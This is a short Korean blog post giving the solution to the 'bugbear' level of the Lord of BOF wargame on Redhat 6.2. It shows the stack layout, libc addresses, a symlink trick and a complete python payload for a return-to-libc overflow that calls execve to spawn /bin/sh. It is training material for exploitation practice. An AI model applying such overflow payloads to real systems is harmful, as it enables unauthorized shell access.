본문 바로가기

Wargames/Load Of BOF

LOB Redhat 6.2 - bugbear


bugbear - RTL2

stack : *ret[4] + *execve_addr[4] + *execve_offset[4] + *lib_addr[4] + *fp[4] + buffer[40] + sfp[4] + ret[4]1

execve : 0x400a9d48
exit : 0x400391e0

evecve(filename, *argv[], 0) -> execve("/bin/sh", &"/bin/sh", \x00, &NULL)

Symbolic Link : ln -s giant `python -c 'print "\xf9\xbf\x0f\x40"'` (address of "/bin/sh")

"/bin/sh" : 0x400fbff9
&"/bin/sh", \x00 : 0xbffffff7
&NULL :  0xbffffffc

Payload : ./`python -c 'print "\xf9\xbf\x0f\x40"'` "`python -c 'print "A"*44 + "\x48\x9d\x0a\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40" + "\xf7\xff\xff\xbf" + "\xfc\xff\xff\xbf"'`"


Using RTL_execve

'Wargames > Load Of BOF' 카테고리의 다른 글

LOB Redhat 6.2 - assassin  (0) 2015.10.30
LOB Redhat 6.2 - giant  (0) 2015.10.30
LOB Redhat 6.2 - darkknight  (0) 2015.10.29
LOB Redhat 6.2 - golem  (0) 2015.10.29
LOB Redhat 6.2 - skeleton  (0) 2015.10.24